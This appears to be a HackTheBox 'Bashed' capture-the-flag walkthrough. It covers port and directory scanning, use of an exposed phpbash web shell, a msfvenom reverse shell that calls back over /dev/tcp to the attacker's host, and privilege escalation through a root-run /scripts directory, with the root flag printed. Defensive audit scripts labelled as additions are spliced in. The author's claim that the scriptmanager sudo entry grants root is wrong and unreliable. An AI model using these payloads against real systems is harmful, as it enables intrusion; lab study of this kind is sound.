HackTheBox - Bashed Walkthrough

in #hackthebox · 7 years ago (edited)

Introduction

This is one of my first HackTheBox walkthroughs, and it covers a rather simple yet unstable box: Bashed. Occasionally the box name provides a hint to the flaw, or at least to what direction to follow. In this case, Bashed appears to hint at (though this is not confirmed) CVE-2014-6271, aka Shellshock. As in my other walkthroughs, I'll cover enumeration, exploitation, root, and occasionally closing thoughts. There may be other solutions to the box which I have missed.

Enumeration

I started my initial scans of the box's address 10.10.10.68 with nmap, scanning all ports from 1-65535.

Initiating NSE at 10:17
Completed NSE at 10:17, 0.52s elapsed
Initiating NSE at 10:17
Completed NSE at 10:17, 0.00s elapsed
Nmap scan report for 10.10.10.68
Host is up (0.11s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.44 seconds
           Raw packets sent: 1717 (75.524KB) | Rcvd: 1019 (40.764KB)
root@kali:~/ctfs/hackthebox#

A simple web server. I don't know any hostnames for the box, so I'll assume that querying the IP will serve a real web page rather than some default web server page.

Woohoo, we're in luck! A web page talking about a shell called phpbash. Hey, it's "even developed on this server", so where might that be?

I searched his GitHub for information; however, guessing filenames didn't appear to work. Afterwards, I ran a directory scan which returned promising results :)

root@kali:~/tools/dirsearch# python3 dirsearch.py -u http://10.10.10.68/ -w /usr/share/dirb/wordlists/big.txt -e php -f

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 40936

Error Log: /root/tools/dirsearch/logs/errors-18-04-28_10-23-21.log

Target: http://10.10.10.68/

[10:23:43] Starting:
[10:24:01] 403 -  299B  - /.htaccess.php
[10:24:02] 403 -  299B  - /.htpasswd.php
[10:28:00] 200 -    0B  - /config.php
[10:28:12] 200 -    2KB - /css/
[10:28:27] 200 -    1KB - /dev/
[10:29:18] 200 -    2KB - /fonts/
[10:30:03] 403 -  292B  - /icons/
[10:30:06] 200 -    2KB - /images/
[10:30:31] 200 -    3KB - /js/
[10:32:12] 200 -  939B  - /php/
[10:33:20] 403 -  300B  - /server-status/
[10:34:32] 200 -   14B  - /uploads/

Task Completed

The rest look standard, so I'll skip those and look at /dev/, which appears out of place. Maybe it contains a development version of phpbash?

Success on http://10.10.10.68/dev/phpbash.php!

We have command execution, so why not drop a more proper shell? I'll generate one with msfvenom.

root@kali:~/tools/dirsearch# ip addr show tun3
Device "tun3" does not exist.
root@kali:~/tools/dirsearch# ip addr show tun2
5: tun2: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 100
    link/none
    inet 10.10.14.242/23 brd 10.10.15.255 scope global tun2
       valid_lft forever preferred_lft forever
    inet6 dead:beef:2::10f0/64 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::a03f:4fc2:5ab2:7682/64 scope link stable-privacy
       valid_lft forever preferred_lft forever
root@kali:~/tools/dirsearch# msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.242 LPORT=7777 -f raw
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 66 bytes
0<&103-;exec 103<>/dev/tcp/10.10.14.242/7777;sh <&103 >&103 2>&103
root@kali:~/tools/dirsearch# ncat -vlp 7777
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::7777
Ncat: Listening on 0.0.0.0:7777
Ncat: Connection from 10.10.10.68.
Ncat: Connection from 10.10.10.68:41664.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

I'll spawn a fake TTY with python -c 'import pty; pty.spawn("/bin/bash")' and enumerate further from there.

Escalation

One of the first things to check on a box is the sudo policy. Maybe you can run arbitrary scripts as root without a password? To do so, run sudo -ln.

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@bashed:/var/www/html/dev$ sudo -ln
sudo -ln
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/var/www/html/dev$

A script manager! The NOPASSWD: ALL entry tells us we do not need a password to complete the sudo command, and that I have full permissions to run as root.
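A quick audit of the sudo -l output above, as an added example that is not part of the original write-up: it parses the command entries, records which user each one runs as, and flags any entry that grants every command, with NOPASSWD treated as high severity. The regex and function names are my own; the sample input is the box's own output from above.

```python
import re

# Sample `sudo -l` output, copied from the box's own output earlier on this page.
SUDO_L_OUTPUT = r"""Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
"""

# Matches entries such as "(scriptmanager : scriptmanager) NOPASSWD: ALL" or
# "(root) /usr/bin/vim": runas user, optional runas group, tags, then commands.
ENTRY_RE = re.compile(
    r"^\s*\((?P<user>[^:)]+?)(?:\s*:\s*(?P<group>[^)]+?))?\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def parse_sudo_l(text):
    """Return the command entries of `sudo -l` output as dicts (Defaults section is skipped)."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if m:
            tags = [t.rstrip(":") for t in m.group("tags").split()]
            entries.append({
                "runas_user": m.group("user").strip(),
                "runas_group": (m.group("group") or "").strip(),
                "tags": tags,
                "commands": m.group("cmds").strip(),
            })
    return entries

def risky_entries(entries):
    """Flag entries that allow ALL commands; NOPASSWD makes them high severity."""
    findings = []
    for e in entries:
        if e["commands"] == "ALL":
            severity = "high" if "NOPASSWD" in e["tags"] else "medium"
            findings.append((severity, e["runas_user"], e["commands"]))
    return findings
```

Run against the box's output it reports one high-severity entry, and the runas user it records is scriptmanager, which is the user the entry actually grants.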

However, after trying for the past few hours, I was unable to complete the action. Maybe something is missing; I'm not entirely sure. I did, however, see a directory on the root filesystem called /scripts/. Checking in there, I found an arbitrary script. How does this come into play?

I checked the running processes with ps -ef | grep scripts and saw these entries:

www-data@bashed:/$ ps -ef | grep scripts
ps -ef | grep scripts
root        916    877  0 07:28 pts/0    00:00:00 sudo -u scriptmanager vi /scripts/qwerty.py
scriptm+    917    916  0 07:28 pts/0    00:00:00 vi /scripts/qwerty.py
www-data   1585   1393  0 07:41 ?        00:00:00 sh -c cd /scripts; python -c "import pty; pty.spawn('/bin/bash')" 2>&1
www-data   1628   1612  0 07:42 ?        00:00:00 sh -c cd /scripts; python -c "import pty; pty.spawn('/bin/bash')" 2>&1
www-data   2425   1935  0 07:51 pts/18   00:00:00 grep scripts
www-data@bashed:/$

From this, we can gather that there are scripts running as root in /scripts/. Any script placed within the directory with the extension *.py will run as root!

With this in mind, I wrote a simple one-liner using os.system to run a command as root and achieve 'root'.

www-data@bashed:/scripts$ echo 'import os; os.system("cat /root/root.txt > /dev/shm/.test.txt")' > test.py
www-data@bashed:/scripts$ cat test.py
import os; os.system("cat /root/root.txt > /dev/shm/.test.txt")
www-data@bashed:/scripts$ ls -lat
total 60
-rwxrwxrwx  1 scriptmanager scriptmanager    64 Apr 28 08:37 test.py
-rw-r--r--  1 scriptmanager scriptmanager 12288 Apr 28 08:36 .test.py.swp
drwxrwxrwx  2 scriptmanager scriptmanager  4096 Apr 28 08:36 .
-rw-r--r--  1 scriptmanager scriptmanager   217 Apr 28 08:36 t2.py
-rw-r--r--  1 scriptmanager scriptmanager   223 Apr 28 08:35 bla.py
-rw-r--r--  1 scriptmanager scriptmanager   216 Apr 28 08:21 omkv.py
-rw-------  1 www-data      www-data      12288 Apr 28 07:42 .test.py.swo
-rw-------  1 scriptmanager scriptmanager 12288 Apr 28 07:29 .qwerty.py.swp
drwxr-xr-x 23 root          root           4096 Dec  4 13:02 ..
www-data@bashed:/scripts$ cat test.py
import os; os.system("cat /root/root.txt > /dev/shm/.test.txt")
www-data@bashed:/scripts$ cd /dev/shm/
www-data@bashed:/dev/shm$ ls
www-data@bashed:/dev/shm$ ls -alt
total 0
drwxr-xr-x 19 root root 4240 Apr 28 07:26 ..
drwxrwxrwt  2 root root   40 Apr 28 07:26 .
www-data@bashed:/dev/shm$ ls -lat
total 4
-rw-r--r--  1 root root   33 Apr 28 08:39 .test.txt
drwxrwxrwt  2 root root   60 Apr 28 08:38 .
drwxr-xr-x 19 root root 4240 Apr 28 07:26 ..
www-data@bashed:/dev/shm$ cat .test.txt
cc4f0afe3a1026d402ba10329674a8e2
www-data@bashed:/dev/shm$
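From the defender's side, the misconfiguration exploited above is a root-run job consuming *.py files from a directory that a non-root user owns and that everyone can write to (drwxrwxrwx scriptmanager, -rwxrwxrwx test.py in the listing). This added audit helper is not part of the original write-up; it reports those conditions for a given directory and, to demonstrate, constructs a throwaway directory with the same mode bits as the ls -lat output above. The function names and the demo files are my own.

```python
import os
import stat
import tempfile
from pathlib import Path

def audit_script_dir(directory, runner_uid=0):
    """Report why *.py files in `directory` are unsafe to execute as `runner_uid`.

    Returns a list of (path, reason) tuples; an empty list means no finding.
    runner_uid defaults to 0 because the job on the box runs as root.
    """
    findings = []
    d = Path(directory)
    dst = d.stat()
    # A directory writable by others lets any local user drop a new script into it.
    if dst.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((str(d), "directory is group/world-writable"))
    if dst.st_uid != runner_uid:
        findings.append((str(d), f"directory owned by uid {dst.st_uid}, not runner uid {runner_uid}"))
    for script in sorted(d.glob("*.py")):
        st = script.stat()
        # A script the runner does not own can be edited by whoever does own it.
        if st.st_uid != runner_uid:
            findings.append((str(script), f"owned by uid {st.st_uid}, not runner uid {runner_uid}"))
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((str(script), "script is group/world-writable"))
    return findings

def build_demo_dir():
    """Construct a throwaway directory mirroring the mode bits of the box's /scripts listing."""
    tmp = Path(tempfile.mkdtemp(prefix="scripts-audit-"))
    (tmp / "test.py").write_text('import os; os.system("id")\n')  # constructed sample
    (tmp / "safe.py").write_text('print("hello")\n')               # constructed sample
    os.chmod(tmp / "test.py", 0o777)   # -rwxrwxrwx, as test.py appears above
    os.chmod(tmp / "safe.py", 0o644)   # -rw-r--r--, a properly locked-down script
    os.chmod(tmp, 0o777)               # drwxrwxrwx, as /scripts appears above
    return tmp

if __name__ == "__main__":
    # Pass our own uid as the runner so only the mode-bit findings show in the demo.
    demo = build_demo_dir()
    for path, reason in audit_script_dir(demo, runner_uid=os.getuid()):
        print(f"{path}: {reason}")
```

On a real host, run it as root against /scripts with the default runner_uid=0, and the ownership findings will appear as well.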

Thoughts

After completing the box, I learned that my assumption of Shellshock was incorrect. Instead, that applied to an older box called Shocker. You can hopefully deduce the dangers of sudo policies as well, as we were able to run arbitrary commands as another user. This was a very simple box and I hope to provide a more detailed write-up on other boxes in the future.